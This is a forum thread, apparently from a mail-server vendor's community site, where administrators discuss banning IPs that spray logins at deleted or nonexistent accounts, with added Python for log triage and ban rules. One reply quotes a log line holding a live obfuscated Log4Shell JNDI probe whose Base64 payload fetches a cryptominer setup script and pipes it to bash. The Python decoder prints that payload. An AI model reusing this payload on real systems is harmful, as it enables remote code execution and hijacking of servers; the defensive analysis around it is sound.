8
Suggestion: Instant SMTP Block on Failed Authentication for a Nonexistent User
Idea shared by Curtis Kropar www.HawaiianHope.org - 3/2/2017 at 5:00 PM
Under Consideration
In our server logs I am seeing thousands of "Authentication failed" messages. But these are not for our users who are forgetting their passwords; these are people trying to log in with accounts that do not even exist, or accounts that did exist at one point but have since been deleted. The same IP addresses are trying dozens of random user names to try to get one that works. They try one or two, drop the connection, then maybe several hours later try again, or try from a different IP address. This tactic is bypassing our brute force filter, which I thought I set pretty aggressively at 2 failures in 240 minutes, banned for 3 months.
 
What I would like to see is this: if an IP address tries to authenticate with a user account that does not exist, it is immediately banned.

www.HawaiianHope.org - Providing technology services to non-profit organizations, low income families, homeless shelters, clean and sober houses and prisoner reentry programs. Since 2015, we have refurbished over 11,000 computers!

21 Replies

0
Hear Hear
Kendra Support http://www.kendra.com support@kendra.com 425-397-7911 Junk Email filtered ISP
0
Bump.
Any feedback on this? Was this ever implemented?
0
Employee Post
Curtis,

This was also referenced in this thread:

It has been submitted as a feature request.
0

Hi!

Was this ever implemented?


1
Bump, 7 years old.
0
Potential downside is every time someone makes a typo configuring a new client you’ll be getting a call. 
0
But they usually don't...
3
I know users who would put their email address in 5 times because they forgot it or suffer memory loss.
1
Then put a limit on it (5 times) before a block occurs....
0
Ron, more specifically, I am looking at attacks on user accounts and domains that may have existed but no longer exist. We have several domains where the org has migrated over to a completely new domain name, still on our same server, but now they use a different domain, and dozens of accounts across multiple domains where the user is gone and not coming back. Hackers out there may have their old credentials, but at minimum they have their email accounts. What is happening is attacks are trying to log in as those accounts that are no longer there and on the old domain that is no longer in use. It is sometimes hundreds per day.

Maybe what would be nice is a flag on a user account or domain: "if this account tries to log in, ban the IP".
0
Failed logins (10 ish) and the originating IP gets banned....
0
Brian, as I posted in my original, they are bypassing this. Apparently they figured out I block on 2 failures in 240 minutes. So they will try once, then try again from a different IP address, then come back about 6 hours later and try again from a previous IP address, or try to log in to a different email account, not the same one. I am getting tons of one-hit wonders, and not much banning happening.
1
Ok, I just looked at it. To give you an example - for a single account that no longer exists, I have 1,480 attempts to authenticate this particular account in the last 28 days, from 978 unique IP Addresses.
And that is just one of the accounts that we have issues with out of dozens.
0
@Curtis

You can do a rule like this:



This will BLOCK a user E-MAIL (per email address)
Gabriele Maoret - Head of SysAdmins at SERSIS Currently manages 6 SmarterMail installations (1 in the cloud for SERSIS which provides services to a few hundred third-party email domains + 5 on-premise for customers who prefer to have their mail server in-house)
0
We need the IP blocked... not the email address
0
Unfortunately, it's very difficult to write a rule that blocks IPs that try to login 2 times a day (or less..) without having too many false positives...

I really don't know how that can be done... I don't know any system that can do that, but if you find one (free or paid) please tell us so we can give it a try...
0
MailEnable has it built in.

You can define the amount of failed logins and then the IP gets banned.
1
You can do that even in SmarterMail:


The problem is that it is annoying to ban an IP because it failed to log in 1 time every 15-20 days (you can set TIME FRAME to 21600 minutes if you want), because this could very likely be a false positive...

However, if you want, in SmarterMail you can set multiple rules with different parameters for IP Banning, so you can detect different behaviors of different attackers, for example a rule that blocks like mine above, and another that blocks if an IP fails 2 times in 30 days...

0
Already have that in place, Gabriele :) Thanks.
1
I would suggest more rules:

1. Blacklist if an IP tries to authenticate on port 25; to us, port 25 is for server-to-server only.
2. Blacklist if an IP submits `Unrecognized authentication type`.
3. Blacklist if an IP submits a bad command.
4. Drop the connection of an IP from a disallowed country, if defined, or add it to the blacklist.

Here is our server's log; apparently it is from a bad bot. Most incoming traffic now is of the types below.

[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] rsp: 500 command unrecognized
[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] cmd: Bearer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//85.31.47.139:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')
[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] Closing transmission channel: too many bad commands
[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] rsp: 421 Too many bad commands, closing transmission channel
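The `cmd:` line quoted above is a Log4Shell-style probe: the `${env:NaN:-x}` fragments are Log4j default-value lookups that resolve to single characters so that the string `jndi:ldap` never appears literally in the log. What follows is an added example in Python, not SmarterMail code and not anything the poster supplied: it parses those four log lines (embedded verbatim as the sample input), collapses the default-value lookups, pulls out the JNDI URI and the Base64 command it carries, and counts `500` responses, so that a ban decision for the IP can rest on what the bot actually sent rather than on a generic "bad command" count. The line regex and the names `triage`, `should_ban`, `deobfuscate` and `decode_payload` are this example's own.

```python
# Added example (not SmarterMail's own code): triage of the bad-command log lines
# quoted in the thread. De-obfuscates the Log4j lookup, decodes the payload,
# and produces per-IP findings to drive an IP ban.
import base64
import re

# The four lines quoted in the post, embedded verbatim as the sample input.
POSTED_LOG = (
    "[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] rsp: 500 command unrecognized\n"
    "[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] cmd: Bearer: t('${${env:NaN:-j}ndi"
    "${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//85.31.47.139:3306/TomcatBypass/Command/Base64/"
    "a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQu"
    "YzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9V"
    "Uy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1"
    "b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')\n"
    "[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] Closing transmission channel: too many bad commands\n"
    "[2024.06.04] 08:36:01.028 [95.214.55.144][23727203] rsp: 421 Too many bad commands, closing transmission channel\n"
)

# "[date] time [ip][session] cmd|rsp: body" as seen in the quoted lines (assumed stable).
LINE = re.compile(
    r"^\[[\d.]+\] [\d:.]+ \[(?P<ip>[^\]]+)\]\[(?P<session>\d+)\] (?P<kind>cmd|rsp): (?P<body>.*)$"
)
# ${lookup:key:-default}: Log4j substitutes the default when the lookup is empty.
DEFAULT_LOOKUP = re.compile(r"\$\{[A-Za-z]+:[^:}]*:-([^}]*)\}")
JNDI = re.compile(r"\$\{jndi:(?P<uri>(?:ldaps?|rmi|dns|iiop|nis|nds|corba)://[^}]*)\}", re.I)
B64_PAYLOAD = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")


def deobfuscate(text):
    """Collapse every ${lookup:key:-default} to its default until nothing changes."""
    while True:
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
        if new == text:
            return text
        text = new


def decode_payload(uri):
    """Return the decoded /Base64/ segment of a JNDI exploit URI, or None."""
    m = B64_PAYLOAD.search(uri)
    if not m:
        return None
    raw = m.group(1)
    raw += "=" * (-len(raw) % 4)  # probes often drop the padding
    try:
        return base64.b64decode(raw).decode("utf-8", "replace")
    except ValueError:
        return None


def triage(log_text):
    """Per-IP findings: count of 500 responses, JNDI URIs seen, decoded payloads."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        f = findings.setdefault(m["ip"], {"bad_commands": 0, "jndi": [], "payloads": []})
        if m["kind"] == "rsp" and m["body"].startswith("500"):
            f["bad_commands"] += 1
        elif m["kind"] == "cmd":
            for j in JNDI.finditer(deobfuscate(m["body"])):
                f["jndi"].append(j["uri"])
                payload = decode_payload(j["uri"])
                if payload:
                    f["payloads"].append(payload)
    return findings


def should_ban(finding):
    """The poster's rule 3 (any bad command) plus an explicit JNDI-probe trigger."""
    return bool(finding["jndi"]) or finding["bad_commands"] >= 1


if __name__ == "__main__":
    for ip, f in triage(POSTED_LOG).items():
        print(ip, "ban" if should_ban(f) else "ok", f["jndi"][:1], f["payloads"][:1])
```

The decoded payload shows why the probe deserves a ban rather than a mere disconnect: it is a shell one-liner that kills competing miners and pipes a mining-pool setup script into `bash`. The de-obfuscation loop matters because a pattern match on the literal text `jndi:ldap` would miss this line entirely.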
0
Gabriele, I think really for my suggestion to work properly, SmarterMail would need to have an option where we could check a box and flag an account or domain, or type in a domain or account to target it. Again, I am primarily wanting to target accounts on our server that USED TO BE legit but no longer exist, because the same IPs that are blasting away trying to log into them are also trying to log into our legitimate accounts as well. So if we can identify and block the ones going after accounts and domains that no longer exist, then it will drastically cut down on other attacks as well.

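The thread circles three distinct rules: the original request (ban on the very first attempt against a flagged deleted account or retired domain), the "allow a few attempts before a block" limit for nonexistent users, and the N-failures-in-a-window rule that the one-attempt-every-six-hours pattern slips under. The following is an added example in Python, not SmarterMail's rule engine or its syntax, that evaluates all three together over constructed log lines so the difference in what each catches is visible. The bracketed line prefix copies the SMTP log format quoted in the thread, but the wording "Authentication failed for user ..." is an assumption; the IP addresses, account lists and the names `BanEvaluator`, `evaluate` and `run_example` are this example's own.

```python
# Added example (not SmarterMail code): three IP-ban rules evaluated together over
# constructed authentication-failure log lines.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log. 203.0.113.9 bursts; 192.0.2.44 spaces its attempts >4 h apart
# and then touches a deleted account; 203.0.113.50 sprays invented names one every 5 h;
# 198.51.100.7 targets a retired domain; 192.0.2.1 is a real user with one typo.
SAMPLE_LOG = """\
[2024.06.04] 00:05:00.000 [203.0.113.50][2001] Authentication failed for user admin@example.org
[2024.06.04] 02:10:05.101 [198.51.100.7][2002] Authentication failed for user info@old-domain.example
[2024.06.04] 02:30:00.000 [192.0.2.44][2003] Authentication failed for user jane@example.org
[2024.06.04] 05:05:00.000 [203.0.113.50][2004] Authentication failed for user test@example.org
[2024.06.04] 08:15:12.003 [203.0.113.9][2005] Authentication failed for user jane@example.org
[2024.06.04] 08:20:00.500 [203.0.113.9][2006] Authentication failed for user bob@example.org
[2024.06.04] 09:00:00.000 [192.0.2.44][2007] Authentication failed for user jane@example.org
[2024.06.04] 10:00:00.000 [192.0.2.1][2008] Authentication failed for user jnae@example.org
[2024.06.04] 10:05:00.000 [203.0.113.50][2009] Authentication failed for user sales@example.org
[2024.06.04] 15:05:00.000 [203.0.113.50][2010] Authentication failed for user office@example.org
[2024.06.04] 15:30:00.000 [192.0.2.44][2011] Authentication failed for user jane@example.org
[2024.06.04] 20:05:00.000 [203.0.113.50][2012] Authentication failed for user support@example.org
[2024.06.04] 21:45:00.000 [192.0.2.44][2013] Authentication failed for user deleted.user@example.org
"""

# Assumed failure-line wording; only the bracketed prefix is taken from the thread.
AUTH_FAIL = re.compile(
    r"^\[(?P<date>\d{4}\.\d{2}\.\d{2})\] (?P<time>\d{2}:\d{2}:\d{2}\.\d{3}) "
    r"\[(?P<ip>[^\]]+)\]\[\d+\] Authentication failed for user (?P<user>\S+)$"
)


def parse_failures(text):
    """Yield (timestamp, ip, user) for each authentication-failure line."""
    for line in text.splitlines():
        m = AUTH_FAIL.match(line)
        if m:
            ts = datetime.strptime(f"{m['date']} {m['time']}", "%Y.%m.%d %H:%M:%S.%f")
            yield ts, m["ip"], m["user"].lower()


class BanEvaluator:
    def __init__(self, existing, tripwire_users, tripwire_domains,
                 burst_limit=2, burst_window=timedelta(minutes=240), spray_limit=5):
        self.existing = {u.lower() for u in existing}
        self.tripwire_users = {u.lower() for u in tripwire_users}
        self.tripwire_domains = {d.lower() for d in tripwire_domains}
        self.burst_limit, self.burst_window, self.spray_limit = burst_limit, burst_window, spray_limit
        self.recent = defaultdict(deque)   # ip -> failure timestamps inside the burst window
        self.unknown = defaultdict(int)    # ip -> lifetime attempts on nonexistent accounts
        self.bans = {}                     # ip -> reason

    def _ban(self, ip, reason):
        self.bans[ip] = reason
        return reason

    def observe(self, ts, ip, user):
        """Feed one failure; return the ban reason if this IP is (now) banned."""
        if ip in self.bans:
            return self.bans[ip]
        domain = user.rsplit("@", 1)[-1]
        # Rule 1, the thread's proposal: a flagged deleted account or retired domain is a
        # tripwire. One attempt is enough and there is no time window.
        if user in self.tripwire_users or domain in self.tripwire_domains:
            return self._ban(ip, f"tripwire: attempt on {user}")
        # Rule 2, the classic burst rule: N failures within the window (2 in 240 min here).
        q = self.recent[ip]
        q.append(ts)
        while ts - q[0] > self.burst_window:
            q.popleft()
        if len(q) >= self.burst_limit:
            return self._ban(ip, f"burst: {len(q)} failures within {self.burst_window}")
        # Rule 3: lifetime count of attempts on accounts that do not exist. The limit
        # tolerates a few typos but still catches slow spraying of invented names.
        if user not in self.existing:
            self.unknown[ip] += 1
            if self.unknown[ip] >= self.spray_limit:
                return self._ban(ip, f"spray: {self.unknown[ip]} attempts on nonexistent accounts")
        return None


def evaluate(log_text, evaluator):
    """Run every failure line through the evaluator; return {ip: reason} for banned IPs."""
    for ts, ip, user in parse_failures(log_text):
        evaluator.observe(ts, ip, user)
    return dict(evaluator.bans)


def run_example():
    ev = BanEvaluator(existing={"jane@example.org", "bob@example.org"},
                      tripwire_users={"deleted.user@example.org"},
                      tripwire_domains={"old-domain.example"})
    return evaluate(SAMPLE_LOG, ev)


if __name__ == "__main__":
    for ip, reason in run_example().items():
        print(f"ban {ip}: {reason}")
```

On the sample, 203.0.113.9 is caught by the burst rule, 198.51.100.7 and 192.0.2.44 by the tripwire (the latter only after three attempts against a real account, spaced more than four hours apart, had passed under the window unnoticed), 203.0.113.50 by the nonexistent-account counter, and the single typo from 192.0.2.1 is left alone. Rule 3 deliberately has no time window; that is what makes the one-hit-every-few-hours pattern accumulate into a ban, at the cost that a misconfigured client which keeps retrying a wrong address will eventually trip it too.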
